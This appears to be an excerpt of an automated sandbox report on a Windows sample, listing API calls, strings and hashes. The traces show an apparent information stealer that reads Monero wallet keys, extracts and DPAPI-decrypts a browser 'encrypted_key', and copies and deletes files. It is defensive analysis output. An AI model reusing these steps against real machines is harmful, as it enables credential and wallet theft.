                              • LocalAlloc.KERNEL32(00000040,?), ref: 00149F41
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 91b3f78db31c7c801d27c537d76381df9915c1abbf85564eb8ec098e07bd5ba5
                              • Instruction ID: 47ac2e5d432c3c4e50063061971128e2008de5bca96a5859db6c994794cd794a
                              • Opcode Fuzzy Hash: 91b3f78db31c7c801d27c537d76381df9915c1abbf85564eb8ec098e07bd5ba5
                              • Instruction Fuzzy Hash: 5C616070940248EFDB24EFA4CC96FEE7779AF54301F408118F91A9F191EB706A0ACB52
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00DDDA48,00000000,00020119,?), ref: 001540F4
                              • RegQueryValueExA.ADVAPI32(?,00DDE4D0,00000000,00000000,00000000,000000FF), ref: 00154118
                              • RegCloseKey.ADVAPI32(?), ref: 00154122
                              • lstrcat.KERNEL32(?,00000000), ref: 00154147
                              • lstrcat.KERNEL32(?,00DDE518), ref: 0015415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 9475541d8dcd458a51ba6fa3570d505642c28e35bfb0847f82ec41c7efbff5a8
                              • Instruction ID: 8e5baf93db39688519e37de010a3aa2b955ff6b8fd6dc07ecb3aa129054da470
                              • Opcode Fuzzy Hash: 9475541d8dcd458a51ba6fa3570d505642c28e35bfb0847f82ec41c7efbff5a8
                              • Instruction Fuzzy Hash: 1741BCB6D10208ABDB15EBA0DC46FFD737DAB98300F004599B7255B181EB755B8C8BD2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00DCB578,00000000,00020119,?), ref: 00157E5E
                              • RegQueryValueExA.ADVAPI32(?,00DDD7E8,00000000,00000000,000000FF,000000FF), ref: 00157E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00157E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 55cec0a51e15ff3d787e8729fa256acc7a237898886b07c092bc1f9a8831c871
                              • Instruction ID: db8a34a263d4bbdc5c3d755ac8902ea0a5f81a14d7bf2766d2a4d1f98099ceb4
                              • Opcode Fuzzy Hash: 55cec0a51e15ff3d787e8729fa256acc7a237898886b07c092bc1f9a8831c871
                              • Instruction Fuzzy Hash: 481151B1A44705EBE715CFD4ED4AF7BBBBCEB04711F10415AFA15A7280D77458048BA1
                              APIs
                              • StrStrA.SHLWAPI(00DDE260,?,?,?,0015140C,?,00DDE260,00000000), ref: 0015926C
                              • lstrcpyn.KERNEL32(0038AB88,00DDE260,00DDE260,?,0015140C,?,00DDE260), ref: 00159290
                              • lstrlen.KERNEL32(?,?,0015140C,?,00DDE260), ref: 001592A7
                              • wsprintfA.USER32 ref: 001592C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 990f39d35bad51b4652817633538fd7640f1bfe55a17cb48da588f89b9b91128
                              • Instruction ID: 64013c1a56cdc0308f6d992f1c2166572e0aaa993426bf45b09940e943329d8d
                              • Opcode Fuzzy Hash: 990f39d35bad51b4652817633538fd7640f1bfe55a17cb48da588f89b9b91128
                              • Instruction Fuzzy Hash: 6C010C75500608FFDB05DFECC984EAE7BB9EB48351F108189F9098B204C731EA40DB92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001412B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001412BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001412D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001412F5
                              • RegCloseKey.ADVAPI32(?), ref: 001412FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 7d482d2c351d264e63c1eae45d72286eca06c69c702972a2b96c375e7f19f470
                              • Instruction ID: 6705d430ffc3fdce1a81f73a5cd658284d50927c773069378de804183d88bc3f
                              • Opcode Fuzzy Hash: 7d482d2c351d264e63c1eae45d72286eca06c69c702972a2b96c375e7f19f470
                              • Instruction Fuzzy Hash: 650136B5A40308BBEB00DFE0DC49FAEB7BCEB48701F108195FA05D7280D6749A019F51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 8ff013f619eb2a416373ba0118e91791c687da90bfbb81801c287de570fe0cb9
                              • Instruction ID: 56f4de7627b80e87fd40dc5fe6525019e41dd975048b45f96c5464532191e118
                              • Opcode Fuzzy Hash: 8ff013f619eb2a416373ba0118e91791c687da90bfbb81801c287de570fe0cb9
                              • Instruction Fuzzy Hash: AC41E77150079C9EDB258F24CC94BFB7BF89F45709F1444A8ED9A8A182D3719A48CF60
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00156663
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00156726
                              • ExitProcess.KERNEL32 ref: 00156755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 1abc9ab6b455f066bf18e4e64971fe340b663366b15cb93744809009f7e87b5e
                              • Instruction ID: 47dee0c743806dc3221332b805bbcd308581de4bfe0b9f7dee34580e85eb33ac
                              • Opcode Fuzzy Hash: 1abc9ab6b455f066bf18e4e64971fe340b663366b15cb93744809009f7e87b5e
                              • Instruction Fuzzy Hash: EC316BB1801218EBDB15EB90DC92BDEB77CAF54301F804189F6296A191DF746B48CF6A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00160E28,00000000,?), ref: 0015882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00158836
                              • wsprintfA.USER32 ref: 00158850
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: d2d90db97d47f3429dad176925c7dd65e3a39e4d5be5b4bf8bccb7e35f3a3d9a
                              • Instruction ID: 640e2973e0f7f325fa2a51a1c8bfd18c93d151a3af4f54456fb66fded8a1c899
                              • Opcode Fuzzy Hash: d2d90db97d47f3429dad176925c7dd65e3a39e4d5be5b4bf8bccb7e35f3a3d9a
                              • Instruction Fuzzy Hash: 932100B1A40704EFEB05DFD4DD45FAEBBB8FB48711F104159FA15A7280C77999018BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0015951E,00000000), ref: 00158D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00158D62
                              • wsprintfW.USER32 ref: 00158D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: da76a52097c8eec6ceaaa5270deb6492c7e7645c16dedaaa173e4f023973a40f
                              • Instruction ID: bd5ca79289ff5b93b9c938c5942b2f87f58bb9a4270fd17b41bba6a78da7b62c
                              • Opcode Fuzzy Hash: da76a52097c8eec6ceaaa5270deb6492c7e7645c16dedaaa173e4f023973a40f
                              • Instruction Fuzzy Hash: 07E0ECB5A40308BBE711DBD4DD0AE697BBCEB48702F004195FE0997280DA719E109BA6
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0014A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0014A6BC
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0014A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 910a5096515c9f3e6a210e67e10e7c25747e7ec3987531d7b3ced6a674628458
                              • Instruction ID: 8b1761fe7bdfd0cc39a9808a5d0e9c62e93719348e138c582ca1c97101b53c64
                              • Opcode Fuzzy Hash: 910a5096515c9f3e6a210e67e10e7c25747e7ec3987531d7b3ced6a674628458
                              • Instruction Fuzzy Hash: B3E1C472850118DADB05EBA4DC95DEE733CBF24302F908259F9267A091EF746A4DCB62
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014D481
                              • lstrlen.KERNEL32(00000000), ref: 0014D698
                              • lstrlen.KERNEL32(00000000), ref: 0014D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0014D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 4d8bd3e669c9bc78989daca0c5ff0ef1f53929395d1a5f6cdc4300bdfa3ceb62
                              • Instruction ID: 48e0221d6652e6ee23f072685729718f5fee335ab3294ed99976d980abd15124
                              • Opcode Fuzzy Hash: 4d8bd3e669c9bc78989daca0c5ff0ef1f53929395d1a5f6cdc4300bdfa3ceb62
                              • Instruction Fuzzy Hash: F291E171990118DBDB05EBA4DC96DEE733CBF24302F904259F9276A091EF346A0DCB62
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014D801
                              • lstrlen.KERNEL32(00000000), ref: 0014D99F
                              • lstrlen.KERNEL32(00000000), ref: 0014D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0014DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 470d239272a3e9fe5a83378a908a0aabbfe702e0b70d4b2b444d1a779da0b39c
                              • Instruction ID: 90f71ee3a50c8a0a6d29ff643fde065b6f3c997e7a3333c4950b16b8a808e34d
                              • Opcode Fuzzy Hash: 470d239272a3e9fe5a83378a908a0aabbfe702e0b70d4b2b444d1a779da0b39c
                              • Instruction Fuzzy Hash: BE81D271950118DBDB05FBA4DC56DEE733CBF24302F904659F916AA091EF346A0DCBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 6978c4d9b3326f6231290caae38b042564fad2998210439bb9e5a38bd164e789
                              • Instruction ID: 8f7037bde36098673eec49bd98845d340f557fbfac052e33e38db33ddd760b92
                              • Opcode Fuzzy Hash: 6978c4d9b3326f6231290caae38b042564fad2998210439bb9e5a38bd164e789
                              • Instruction Fuzzy Hash: 97416271D10208EFCB05EFE4CC45AEEB774AF58305F408118E8227B290EB759A09CFA2
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00149D39
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149AEF
                                • Part of subcall function 00149AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00144EEE,00000000,?), ref: 00149B01
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149B2A
                                • Part of subcall function 00149AC0: LocalFree.KERNEL32(?,?,?,?,00144EEE,00000000,?), ref: 00149B3F
                                • Part of subcall function 00149B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00149B84
                                • Part of subcall function 00149B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00149BA3
                                • Part of subcall function 00149B60: LocalFree.KERNEL32(?), ref: 00149BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 9e14a40a968065944f8988c14575771e985ffcf054946fedb6fa94e97778759b
                              • Instruction ID: d410efd4c6e7346a05f217944da2c49b6720038732cec87fe8c643e241a3d98e
                              • Opcode Fuzzy Hash: 9e14a40a968065944f8988c14575771e985ffcf054946fedb6fa94e97778759b
                              • Instruction Fuzzy Hash: C9316FB6D10209ABCF14DFE4DC86EEFB7B8BF58304F144519E915A7251EB309A14CBA1
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001605B7), ref: 001586CA
                              • Process32First.KERNEL32(?,00000128), ref: 001586DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001586F3
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • CloseHandle.KERNEL32(?), ref: 00158761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
